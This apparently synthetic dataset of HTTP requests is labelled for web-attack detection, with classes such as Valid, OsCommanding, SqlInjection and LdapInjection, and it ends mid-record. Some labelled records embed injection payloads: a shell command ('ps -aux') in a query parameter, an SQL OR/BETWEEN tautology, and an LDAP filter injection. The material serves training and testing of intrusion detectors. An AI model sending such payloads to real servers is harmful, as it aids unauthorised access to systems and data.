Authorization: NTLM dTR1T3RUZWJpb2FwNG9xeHRzNWhlNmxybnNOYjZoNG9zc3V0ZW5zaTJpZU10Y2d0
Range: 94941-674,-88804,1546-98301
Referer: /Oy3wita/4ssidn/aolleriV/iketi2h/xdsOi.wmn
TE: trailers,trailers,gzip;q=0.3
Trailer: User-Agent
User-Agent: Mozilla/5.1 (Machintosh; U; PPC 3.1; at-ud; rv:1.9.6) Gecko/86736890
UA-CPU: MIPS
UA-Disp: 617,065,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 625x983
Via: 0.6 209.184.122.136:44654, FTP/9.5 www.nwomeWer.jpg, deh/2.2 www.ttsxys.shtml
Transfer-Encoding: no3e6; Deis=JdtodNk
Upgrade: cdl/2.8, oueiab/2.3, nfnoc/8.1
Warning: 156 85.95.63.97 "Leweeelritieh" 
X-Forwarded-For: 112.141.222.2
X-Serial-Number: 876584717
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36325
Start - Id: 36807
class: OsCommanding
GET /0z_@Zk.Y6A-0SkPs3/l.I6/biaeaiePeobsan5/mYejfQgn/n6jlrfeueleks/mFlln/mmirsHtdefrolt/isox/aIi/afasGztmju2Pw4Hb.php?ongl0twel=p&wJvtelnet_6=rsautoexecrs&ese5essh=ennt7pedpijt&pet1e8nar=knmsztem4oPedoeoh&taab=5&moimaaheetYhIo=%27+++++%3B++ps+++-aux%3B&MO7jF=10&8ttsae12uilbn=yT5Zs0&cat_etcjGyoN=hAcFIeRnMWL&ershrt=gl%247bEpnr+w5maSphp%27r&iuano0sgnHh=qch&ftp3cykvU9O6Llink=atmc&r7aije1ghyom=ScAlae-&elTWAroOre=NFayFien&hmalf9ltll=aj HTTP/1.0
Host: 180.36.152.10
Connection: close
Accept: text/plain, audio/basic, image/png
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Cookie: lapoa=03711;tn26nete5r=niswon>Astn(y)l'ewphps;a.R_havingphpvXpmail=Dhh2usangSmochaM2q;eOdm38zitNheb3T=72
Cookie2: $Version="1"
Date: Sun, 11 Jun 06 14:15:58 GMT
ETag: "2i-Tsg8qHsrARqq@"
Expect: 100-continue
If-Modified-Since: Tue, 13 Jul 04 03:37:44 CET
If-Unmodified-Since: Tue, 15 Nov 05 17:52:24 UTC
If-None-Match: "e9e32HtIeCbZ7hCiff-A"
If-Range: Sat, 18 Jun 05 15:25:02 UTC
Max-Forwards: 55
Pragma: no-cache
Authorization: NTLM b3NkZnMzbm1VaDNidG1lZWNoSG1SZW5XcnNnMDd0aWVub2Fi
Referer: http://irrd.st/aI4tnacx.exe
TE: gzip;q=0.8,trailers
User-Agent: cau3XWtrsdMra8syjh
Via: 2.6 250.177.193.196, hey/5.7 75.118.149.67, HTTP/1.2 www.mneoTepl.jpg
Transfer-Encoding: compress
----: ---------------

null

End - Id: 36807
Start - Id: 5388
class: Valid
POST /esTcoueaTpfcS/9D3K0m3/0EVR5mjX71a.png? HTTP/1.0
Content-Length: 282
Content-Language: Nuinvor
Content-Encoding: deflate
Content-Location: /hlreea.css
Content-MD5: dE1zbGVlZWw2dG9obmxUbA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 15 Dec 04 10:35:07 CET
Last-Modified: Mon, 12 Jan 04 02:03:20 UTC
Host: www.latoTu8Pw.com
Connection: cesbdoEx
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 49.138.242.29
Cookie: jt=IOe(
Cookie2: $Version="64"
Date: Mon, 09 Jul 07 23:08:12 GMT
ETag: "cjysIW1LDWK@fmCFgJ8"
Expect: 100-continue
From: grrehtnt@eeeeuNf.net
If-Modified-Since: Wed, 21 Jul 04 16:41:23 GMT
If-Unmodified-Since: Fri, 27 May 05 23:34:02 CET
If-Match: *
If-None-Match: "BRj8BC3FWUbxzAqz6"
If-Range: Mon, 20 Dec 04 12:43:31 UTC
Max-Forwards: 9
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Basic bWNlZUdjOm5nY2k0dGhh
Authorization: NTLM ZG5uZ01SdmF1cm91bzYybmpPb3RlbHlubGRjMmdlc2NoZHJhaWVpdGM=
Range: 429-04732,0-0702,6-47430
Referer: /sapeas/eREnqUh/ystep/sfde.doc
TE: trailers,deflate;q=0.9
Trailer: Expect
User-Agent: utQ2i1sUY http://www.tmsubK.net
UA-CPU: x86
UA-Disp: 725,766,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 237x186
Via: HTTP/2.5 www.rncypi8.shtml, FTP/2.1 www.dtCsn.html, 4.4 243.206.160.219:94411
Transfer-Encoding: identity
Upgrade: kngae/6.3, mste/8.3, wrohS/0.0, nienm/5.3, e33t/4.1
Warning: 771 24.33.242.71:14 "tear3zyE23loeliir" 
X-Forwarded-For: 72.151.254.224
X-Serial-Number: 028740747069773
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

JHx6=Do&va=sS2fe6cx@8&eaRiMpai0tDg=servicesAsraanm&evTeTec6=dNds&eecO8=6428&ryNq8ituilbbT=ttto  sps&rEgyAx3a3c=886&bwbnecadf9ee9=oh&iauaicrweii=6igK&neyhslEiTomv= ae d nnq\jti&AhHo2f=dysrjbofo2n'9&atdtnri=t/i?nAf5+mi 1aptk &mt=081230432&eIs=28417902&aiolutnnds=f6oeiidxf

End - Id: 5388
Start - Id: 4995
class: Valid
POST /rOists1w9Rni/pjvMqZCBw6fA/aVSraaTCE.mdb? HTTP/1.0
Content-Length: 179
Content-Language: Epeirvu,onfkgmfs
Content-Encoding: deflate
Content-Location: http://Tran.de/eOrnIs/cenwwuo.js
Content-MD5: Z2RhZTV1aG51b3QzZWV1bA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 19 Jan 07 13:03:48 CET
Last-Modified: Wed, 06 Apr 05 22:53:33 GMT
Host: www.torea2nl.be:9
Connection: close
Accept: text/html;q=0.8, application/zip, image/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ntIOxdnt-nrv, ssd7tnW-Hm5, eatti3Sg-sma;q=0.5
Cache-Control: max-age=59
Client-ip: 238.101.102.46
Cookie: nM31U9PssS=joebrMhiaah45;pwindow.openQ5rdxp_T=ters;nse=qkNkexb;Tjlrlenmonu=x7tNDK1
Cookie2: $Version="23"
Date: Sun, 14 Jan 07 14:29:56 GMT
ETag: W/"2vOl.id7V-JKm72nt"
Expect: dsv4OTzt=2bebeit;r5ce=kitkcucs
From: her7cr@helyhe.it
If-Modified-Since: Thu, 28 Jun 07 19:09:19 UTC
If-Unmodified-Since: Wed, 26 Oct 05 07:54:33 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 11 Jan 08 23:35:00 UTC
Max-Forwards: 148
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: re1s oeyla=tamzuv0w
Authorization: 81ua twrn=orke
Range: 57136-3
Referer: http://nreaxhio.biz/hey5orge/snUanbno/wut0ndni/7ros2di8.asmx
TE: trailers
Trailer: Accept-Language
User-Agent: rArqi (i4C.-j8; n@m3s8; bzj7gFm4an)
UA-CPU: 68000
UA-Disp: 770,4092,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5947x3710
Via: 1.8 www.fp8uta.jpeg, FTP/2.9 158.143.207.113
Transfer-Encoding: deflate
Upgrade: hMr/2.1, sbroy7/3.5, sa4aS8/1.4, Tm12uo/1.4, R6cee/4.7
Warning: 599 www.erzlDl.htm "keenmTtpwuriveed" 
X-Forwarded-For: 3.243.104.229
X-Serial-Number: 03530
----: -----------------------
~~~~~: ~~~~~~~~~~~

ntehtooio=4537&8vDsdi2lyr=rKEl5PFGjcP&iprs=620&8esey=epertiiNmotUarm&epdteaeeNI=aA7jR3sGWu&stan4M0zou=gattTs6&vaqnhjfNw=98726555&en6nlhren8fwrCy=4599&cTy-5x9Cpf=deLueieecsofloefel

End - Id: 4995
Start - Id: 11978
class: Valid
GET /HJoShmcp_stylez/_kscriptMTRbpL3/frazl/cL5yWDNA_X.7Qa8AoXi.jpeg?resaen6etma=-i&sVidfphpCHwesam1u=hia0hnd&ueosRahe9eWsie=7S2m&CiIAfsystemHx=8&ateteT=https02iiawEentwyd&awi=r-UQlmfJATue&2toedNVhb9kh=ilt%3Ert HTTP/1.1
Host: www.ghamaermc.st
Connection: oiuk
Accept: application/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: lB-7y;q=0.3, ed45njkw-et1, eneuoy-urInrf;q=0.9
Cache-Control: min-fresh=72
Client-ip: 227.21.129.166
Cookie: F94r9Qyetcw=gwtAs9in;sr1ae=on;jequensfot7=sny/&;etntKiftd=lsuhq;xtpb48binhltont=pOr8rH;cmo= 
Cookie2: $Version="2"
Date: Mon, 28 Jan 08 15:30:22 CET
ETag: "ja7JX40J4YiRO32m"
Expect: 100-continue
From: heeltin@ed0ee3i7c.fr
If-Modified-Since: Thu, 21 Dec 06 02:13:44 UTC
If-Unmodified-Since: Sun, 23 Aug 09 15:22:18 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 12 Aug 07 09:52:02 UTC
Max-Forwards: 1
MIME-Version: 3.7
Pragma: luorsao='StSi'
Proxy-Authorization: Basic bnRlaTpFcjBiY2k=
Authorization: Basic ZG9kdGM6dGRzZTZzYQ==
Range: 9-,78403-
Referer: http://www.Rft4l.gov/nibaqkf/yoenS.jsp
TE: deflate;q=0.9
Trailer: Date
User-Agent: Mozilla/9.5 (Machintosh; U; PPC Mac OS X 4.9; ae-wa; rv:7.0.2) Gecko/93187328
UA-CPU: MIPS
UA-Disp: 833,846,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 630x5808
Via: mNyeE/7.1 171.130.176.37
Transfer-Encoding: compress
Upgrade: ia1c/2.8, mur/1.2, susnSi/2.8, tteid/2.7, nnese/5.9
Warning: 062 www.uhaba3n.jpg:624 "jrE8wfEoytuir6bfae3o" "Tue, 24 Jan 06 06:41:06 CET"
X-Forwarded-For: 239.127.131.42
X-Serial-Number: 670096035438562
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11978
Start - Id: 4555
class: Valid
PUT /9adnadeStzEiovndr/3addshtitpg/sbzEYEf2RX/gincludeLFYb0FMP/oiazcefEntqBxYe/yces/unCON5RJzD8wY05qw/uFfHEDxOUABncwindow.open.pl? HTTP/1.0
Content-Length: 213
Content-Language: l7tathoi,4nsbwih
Content-Encoding: compress
Content-Location: /tnna/resGcotm.exe
Content-MD5: RGZlZWQ5aGVoZWpwaG5hZA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 07 Jan 05 13:36:38 CET
Last-Modified: Wed, 09 Jul 08 06:17:09 GMT
Host: 36.220.94.112
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: *
Cache-Control: no-store
Client-ip: 57.183.252.106
Cookie: oxcaikartved=e9;G3elx=4eopxjtena3a;test7Qso=661832;MgtsjDclhi2s5=fiE
Cookie2: $Version="1"
Date: Thu, 06 Oct 05 12:38:04 GMT
ETag: "osxw@9L9HQLvS.utC4a"
Expect: 100-continue
From: rsnydvh6@sezlefn.be
If-Modified-Since: Wed, 13 Aug 08 07:03:08 CET
If-Unmodified-Since: Fri, 23 Jan 09 06:41:57 CET
If-Match: "1T5BrFpsza0b8IUBJYOy"
If-None-Match: *
If-Range: *
Max-Forwards: 3556
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: uaahe i2mes2rD=Tlhhrotn
Authorization: Digest nc=CA1e9F6D
Range: -1538,010-
Referer: http://www.etcegcA.it/aiosyp2d.jsp
TE: deflate,trailers,gzip;q=0.8
Trailer: Expect
User-Agent: Mozilla/0.6 (compatible; Konqueror/3.5; Linux i386; 8Uw2)
UA-CPU: MIPS
UA-Disp: 453,6755,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 308x492
Via: 4.7 124.197.141.118, FTP/1.6 www.snorn.png
Transfer-Encoding: compress
Upgrade: y3ba/9.8
Warning: 589 28.189.6.206 "nrrp" "Sun, 11 Sep 05 11:50:25 GMT"
X-Forwarded-For: 244.206.80.136
X-Serial-Number: 8388631449289131034
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hiiadn=processing-instructionusrtmpB0o+ Cal&nn=4u a%doRonnCxp_oir0&oeewpf=646&HapTcroalsdl=37845&oyc=0&nritnpErlevtl=aev3ra nt&obolyetarm=7354426&eqiinyme1t=dahce as&uxrlCoga1lce=dc7&F7GX-=fe&snRnd=tOgolPlqen3

End - Id: 4555
Start - Id: 5089
class: Valid
POST /w-p3services/ltaunrrr/AmPNSbetweenxoG/arvxsrFzi/Enhtonhd/i-hbCs/TpJo/k2@fECLVJtF1/mhihoaetxeIllaRtblae.dll? HTTP/1.1
Content-Length: 90
Content-Language: Dogl
Content-Encoding: compress
Content-Location: http://nathh.org/tiih6.nsf
Content-MD5: bTJpaXRjYXNkaWhPdGhTcw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 01 Dec 08 18:47:55 UTC
Last-Modified: Tue, 20 Jul 04 11:53:12 GMT
Host: 37.80.102.247
Connection: l8rmorbe
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: max-stale
Client-ip: 56.116.172.92
Cookie: nlcisAt=cf]iopenub
Cookie2: $Version="5"
Date: Tue, 17 Jun 08 07:44:59 UTC
ETag: "DaBEn5Miu.YgdvkWi"
Expect: 100-continue
From: eiats@ade7g.de
If-Modified-Since: Tue, 28 Nov 06 11:36:12 UTC
If-Unmodified-Since: Mon, 26 Apr 10 23:55:42 CET
If-Match: "QveQ3tUlPsDkv8vTbSx"
If-None-Match: *
If-Range: "m9CMlImUagdV0uL4UB1s"
Max-Forwards: 867
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Basic dGlzRzhldzpsN3dpaW53eQ==
Authorization: Digest cnonce="itwj"
Range: 4666-,507125-81685,186998-
Referer: http://www.pxesiwo.gov/u4Kseh/sqitrles/indio70f/uftneo/8sie.bin
TE: chunked;q=0.3,trailers,trailers
Trailer: Host
User-Agent: ueNtmnf (n9ieyx2qX; n404c1A1; tzG1XpYm8; oDcp8X; tuBOWG)
UA-CPU: PowerPC
UA-Disp: 284,073,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 7848x0876
Via: 9.6 184.160.227.179, esha/8.9 www.rnyly9.css, ortz/3.0 www.8bnDpsum.png
Transfer-Encoding: compress
Upgrade: wdrl1/4.6, o0t/6.1, R5oleg/3.8, gde/0.1
Warning: 632 www.H4iIrtzn.tiff:1455 "lik9idbernmnnttF" 
X-Forwarded-For: 90.219.143.51
X-Serial-Number: 100173301629912
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~

TCxtfH3UF_=etosuniongqlocationriAuA&re8sni&eototnolstnaiq=33273&egelpy=tTUFfeaooesuyybie

End - Id: 5089
Start - Id: 4578
class: Valid
PUT /neUJi_W8Xb/rzxriDgDN/Zey/8cjsh/Ieochc4eo/iElacrFIcmOnm0rt/oshhas5/2dlbstylekN6Ohttps5xlGi/ZR0U59H.tiff? HTTP/1.0
Content-Length: 43
Content-Language: togrlcm,eneuyae,dud
Content-Encoding: deflate
Content-Location: /0pdndie/spjltnsn/agesiT.tar.gz
Content-MD5: djBsbGVibEtoQWNndEUybA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 30 May 06 15:23:57 UTC
Last-Modified: Sun, 29 Apr 07 18:35:34 CET
Host: 57.84.223.11
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.2
Accept-Language: oxoa-h6tl, 0eon-ecT;q=0.0, T-nc;q=0.6
Cache-Control: only-if-cached
Client-ip: 106.227.160.192
Cookie: td=ah5efteWsieds;drAiaEaw1=e/epHi;e2s=005;tdr8sousrEtDuwq=6
Cookie2: $Version="006"
Date: Fri, 02 Apr 04 11:42:59 UTC
ETag: W/"vuwqQYwLICNtYcw6B@4"
Expect: tann=tOETelys;4ivrTo
From: a5wn@h3Rit.be
If-Modified-Since: Sat, 09 Oct 04 24:53:39 GMT
If-Unmodified-Since: Sat, 12 Nov 05 01:21:19 CET
If-Match: *
If-None-Match: "ZusMWhMk8tsdXMVH63"
If-Range: *
Max-Forwards: 9495
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: NTLM bzhzeWdFb2U4c3R0bm9adWxhemVyRXJpY2V0cHd1a2V0ZGVhaXR2c29vdHNjbndk
Authorization: taps elnih=oajRi
Range: -6763
Referer: http://zpgn.it/hRianhei/hudltl/ulteoth/rdso/ahlads.swf
TE: trailers
Trailer: Host
User-Agent: Mozilla/7.9 (Machintosh; U; PPC 0.5; ns-nh; rv:6.5.6) Gecko/10218757
UA-CPU: StrongARM
UA-Disp: 067,349,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 0515x3373
Via: 6.5 2.226.128.18, HTTP/9.3 163.170.56.223:55289
Transfer-Encoding: ipIaiI
Upgrade: y3ba/9.8
Warning: 486 www.o1emOvc.jpeg "et3dsadpnrneep" "Thu, 23 Feb 06 09:52:01 GMT"
X-Forwarded-For: 210.240.131.9
X-Serial-Number: 09527
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

edreThtbr=58211&oStb14t=2i&8dtropeM7le=1183

End - Id: 4578
Start - Id: 28124
class: Valid
GET /Haoq/vu5retscetbnmihysdv/oh5h7y9zddvoieq/rfReieeiaa.nsf? HTTP/1.1
Host: 60.184.174.72
Connection: tambdE
Accept: application/*, application/*;q=0.8
Accept-Charset: iso-8859-5;q=0.3
Accept-Encoding: 
Accept-Language: kvr-baGv4sRc;q=0.8, bearais-n, nRoiOn-e2ia, piii-eHe;q=0.4, s7ndqEb-envEe;q=0.1
Cache-Control: max-stale
Client-ip: 183.104.243.127
Cookie: omt=]-;8tuevisntariNe=sinserth7slL;;ee1Fuc=urinsertk6o7t5aag;oNe0m34d348i=33094585
Cookie2: $Version="590"
Date: Sat, 06 Oct 07 14:20:10 UTC
ETag: W/"iHQda_C-FUBqOY_S"
Expect: Ed1go2uo=tnh6Kn;qnOcrm=aor6o
From: hpcgo@ihivts.be
If-Modified-Since: Sat, 07 Jul 07 14:48:43 CET
If-Unmodified-Since: Sat, 02 Jun 07 19:46:20 CET
If-Match: "SkG_Qu@KYohb.FG3.cX"
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 2.2
Pragma: nkoLpNoh='ebNctelp'
Proxy-Authorization: Basic ZWV5ZW5kOlJIdGRlZWU=
Authorization: Basic c3p1MmRmYWU6YXBhbmVaMUU=
Range: -474316,567101-
Referer: http://2lda.de/aaJtusa.pl
TE: chunked;q=0.8,trailers
Trailer: Proxy-Authorization
User-Agent: iR6oa4nzN/2.8
UA-CPU: Sparc
UA-Disp: 166,4722,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 4261x691
Via: 8.4 www.0atA.gif, scte9/7.7 www.iitneao.gif:6104, 1.1 40.25.149.58:208
Transfer-Encoding: deflate
Upgrade: laa/1.4
Warning: 596 171.12.65.209 "dlqakyiSAeoee" "Wed, 04 Aug 04 21:41:08 GMT"
X-Forwarded-For: 184.51.223.21
X-Serial-Number: 9260606100019
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28124
Start - Id: 42255
class: SqlInjection
GET /taIt2x/i0wnNTjg8W/erD5JFrLmDM/6KQiRkoGHtxp_/eo71suNzm/ox2N1/hainnoeaegaatbwshii/SxMjaGsystem8phj/acT/tZ-/nng0thegnonue5ht/tnpurEUeEHBeins8seaq.aspx?e7Anjn7mfaane=250186&adb2oi=4&baatSbini=o%25n%29&eTgtfd=15194&x8fPcvrmP=%27+++OR+++++%27stkUetant%27+++BETWEEN++++%27R%27+++++AND++%27T&ceae=iss&Gfrom6Cug=h&elya7sssesa=+i%2B+&lehwe=rt&kfKU2A1x_XI=%5C3acyuBxnlii6i%7C&teqkytnlruut=t-5JKPt HTTP/1.1
Host: 116.13.201.232
Connection: close
Accept: audio/x-wav;q=0.2
Accept-Charset: iso-8859-8-i;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 164.216.181.230
Cookie: rapnngg=49487
Cookie2: $Version="528"
Date: Sat, 21 Jan 06 21:25:59 CET
ETag: W/"3EUs5XR7C38VJfgd-18V"
Expect: 100-continue
From: cuyents@tqutcrxrn.be
If-Modified-Since: Tue, 29 Apr 08 23:18:40 UTC
If-Unmodified-Since: Fri, 03 Feb 06 17:13:29 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 01 Nov 09 12:19:07 GMT
Max-Forwards: 8
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: NTLM aWd1eTNuZHNvSTdmd3VkeFJzcHFodHV0dHlmRGVsNm8=
Authorization: NTLM ZGxyY2F3cml0dmFkeHhpZzN2YWlpb3hkM2JvcmR0aW5hcnU=
Range: 4539-14148,-19,934-
Referer: http://eqnenyee.fr/1s4oE.jpg
TE: chunked
Trailer: Accept-Language
User-Agent: h8h3qdo/6.9.7
UA-CPU: StrongARM
UA-Disp: 8058,0040,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 4325x083
Via: FTP/4.2 www.mh7Ikaii.html, 2.1 102.28.194.89, HTTP/9.0 166.196.13.111
Transfer-Encoding: sg8eh; y0Tat6mn=totu3rE
Upgrade: gtaeas/6.8, ae9e/5.6, rdaei/1.7, ilto/8.7, n5w/5.4
Warning: 939 3.193.4.247 "eeviCoadbEttmsy" 
X-Forwarded-For: 42.114.104.151
X-Serial-Number: 29366252
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42255
Start - Id: 24555
class: Valid
GET /dtaxoxcUsm/lkwoetada2skkie/simtc4oSe/55qIpcie4p/nx/loIeFQ0SSUO/ic.mspx?Fitcr5llhac=no&ebepT=3rtlnsgnmLem HTTP/1.0
Host: 89.73.107.244
Connection: close
Accept: */*
Accept-Charset: windows-1257;q=0.1, isiri-3342, x-mac-turkish, windows-1254;q=0.9
Accept-Encoding: gzip
Accept-Language: *;q=0.4
Cache-Control: min-fresh=70869
Client-ip: 194.37.152.82
Cookie: MTue=cnaph;fbwa5UamHoo1hqj=oiuon ;EjTiy5mts=roUD2iqyX@B;l7wOM3rdOP=8;metl=2nnstmpaexecewfn6od
Cookie2: $Version="50"
Date: Tue, 02 Feb 10 23:06:12 GMT
ETag: "YB2LKGSxc6yUsvNNr-M"
Expect: 100-continue
From: edfA@lkti.org
If-Modified-Since: Thu, 22 Nov 07 03:25:11 GMT
If-Unmodified-Since: Fri, 18 Nov 05 06:03:16 UTC
If-Match: "WlX7-dTry.2wCac-LDYe"
If-None-Match: *
If-Range: Thu, 02 Jul 09 18:07:01 GMT
Max-Forwards: 1616
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: nfijte ooosrt=8tertwFe
Authorization: Digest qop=auth-int
Range: 8-,-762016
Referer: http://www.l2atmlec.st/rmtur.cfm
TE: trailers,chunked,trailers
Trailer: Pragma
User-Agent: 2v4Htk2C3 http://www.o8etneh.de
UA-CPU: Sparc
UA-Disp: 6381,2438,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 049x0039
Via: 5.1 167.44.53.192
Transfer-Encoding: compress
Upgrade: tfDtgt/3.8, s7e/0.3
Warning: 453 223.46.17.60:88 "h3yresw" 
X-Forwarded-For: 181.137.254.3
X-Serial-Number: 185732331097779
----: ------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 24555
Start - Id: 37681
class: LdapInjection
POST /mOT33_QZpGhkw/cEXpGhy5HQl/yrreastat/oO4s.jpg? HTTP/1.1
Content-Length: 90
Content-Language: re
Content-Encoding: identity
Content-Location: /noee/Ipdjp/eytR/eecfbqt/Tnrx0eps.tar
Content-MD5: c3RzM2lzenJ1c25tbHM2dA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 23 Jul 07 19:03:55 CET
Last-Modified: Mon, 07 Apr 08 03:12:16 UTC
Host: 16.120.166.209
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: windows-1257, gb2312, x-mac-arabic;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 71.214.180.23
Cookie: ltiocsE5eoCnvt=uoEz6qe
Cookie2: $Version="649"
Date: Thu, 22 Oct 09 19:35:32 CET
ETag: W/"_@vqRjVs1bA1_fJ"
Expect: 100-continue
From: ssDeu@yeiMt.st
If-Modified-Since: Thu, 29 Jan 04 11:58:59 CET
If-Unmodified-Since: Sun, 01 Nov 09 16:03:35 GMT
If-Match: "d_JYcP50@@aMHpK1nS2"
If-None-Match: "Az2HLBp_nIMb@P4"
If-Range: Fri, 18 Mar 05 20:29:55 CET
Max-Forwards: 78
MIME-Version: 8.1
Pragma: ehne7='y8ixje'
Proxy-Authorization: Digest uri=/heen1roq/eredadu/eloyue/dceeE.cgi
Authorization: artndN iein9svf=ysroleo
Range: 6058-6,88-,-245437
Referer: /qrOodc/eperxn/x563rrea.zip
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/2.8 (X11; U; Unix 1.8; ia-na; rv:9.9.6) Gecko/37578754
UA-CPU: MIPS
UA-Disp: 770,856,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 940x1719
Via: 6.1 www.hkime.tiff:2926
Transfer-Encoding: identity
Upgrade: ldon/1.3, oeCc/5.2, eia/8.5, wqT/7.2
Warning: 638 www.testaoOo.shtml "I7qnrs9jyxsxit2" 
X-Forwarded-For: 66.23.157.210
X-Serial-Number: 7386288464563322200
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

teele=nzELeeshrah&hJcnc=d53J-ju-Q&oiNseduxrdnNfE=eeeyw)(&(objectClass  =  se*)

End - Id: 37681
Start - Id: 8731
class: Valid
GET /pc/nqriT/ln6he/o5ZcuEoJQ999LR/tMO/AbxEsrlfeEnX8zaorl/3systemdAbyW/i9/metawgetQTI2@34c/lp20eGoc/ixrWBsvSUOJua.x157T/bIfO.mdb? HTTP/1.1
Host: www.roova.com:30377
Connection: close
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: identity;q=0.0, gzip, identity;q=0.6, compress;q=0.5
Accept-Language: 3A-rovf;q=0.2, cWulrrOe-eelsrtf;q=0.5
Cache-Control: only-if-cached
Client-ip: 110.7.237.199
Cookie: ezt93c2aSrt=39643;9as7=3hHe;7loeutieUhk=n o/insertlocationRibhng$
Cookie2: $Version="57"
Date: Wed, 03 Jun 09 13:32:42 GMT
ETag: W/"yN48kMoIMTdNdg3vEW"
Expect: 100-continue
From: mteeb@o92wOhll.cz
If-Modified-Since: Wed, 14 Jan 04 05:59:56 CET
If-Unmodified-Since: Sun, 07 Jan 07 17:25:42 UTC
If-Match: "-D9eLnBkFUJJ19c5@2"
If-None-Match: *
If-Range: "tHfkeM79v3K5lAqVyDm"
Max-Forwards: 062
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: NTLM dDFlb2lFa2lycG5vbnNhckN0T3lzd2VpMXJWZ2hFeWN3dHRlYTBkc1ZlZEhvZXQ=
Authorization: 5earle aygei=a5rGt
Range: -76,90082-8624,-748
Referer: /e6optd.asp
TE: gzip
Trailer: If-Match
User-Agent: Mozilla/5.9 (compatible; MSIE 7.0; Open BSD i586; bfeeoTw; riecoi2eTa; ry7Ri)
UA-CPU: PowerPC
UA-Disp: 0762,192,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 559x025
Via: 6.7 188.189.151.228, FTP/8.0 74.93.134.152:71
Transfer-Encoding: compress
Upgrade: nr2n/6.6, c8dm/9.0, eih/0.8, mee/9.2
Warning: 196 69.31.102.112 "meOretmuAnoa24aNg" "Sun, 13 Nov 05 21:30:28 UTC"
X-Forwarded-For: 142.15.151.110
X-Serial-Number: 14852095010495286519
----: ---------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 8731
Start - Id: 20915
class: Valid
GET /feqAgEsceuiwfx8eld/a.0WYLlikexJoT2ghttp/ea7hm7WRd3WYm.sh? HTTP/1.0
Host: www.eOrX544di.de:80
Connection: a5yt7Boa
Accept: */*;q=0.8
Accept-Charset: cp-936;q=0.9, iso-8859-1;q=0.8, windows-1258, x-mac-icelandic;q=0.5, x-mac-chinesetrad;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 61.142.7.116
Cookie: llijrPtweu=s1;w8n4tbs=aceoeaalloTouscripteo;ia=3u;wi5abhHsrp=0205821335;eaeAdxe=Uaccept
Cookie2: $Version="9"
Date: Sat, 25 Dec 04 03:53:59 UTC
ETag: "J4lLVZZuWv7_Cno-GkD"
Expect: 100-continue
From: thieLh@bEdxsci.biz
If-Modified-Since: Sun, 22 Jul 07 09:38:03 GMT
If-Unmodified-Since: Tue, 20 Nov 07 17:16:01 GMT
If-Match: *
If-None-Match: "48J3DQ08nT5.xjuy"
If-Range: *
Max-Forwards: 1
MIME-Version: 3.8
Pragma: cehnr='odainb'
Proxy-Authorization: 5lee isw1q=euaaW
Authorization: Basic c2NlazpkZ2NvamZ4
Range: 31-,-608039
Referer: /Heeh9i/eENpr4.msf
TE: trailers
Trailer: If-None-Match
User-Agent: srgaenhff
UA-CPU: 68000
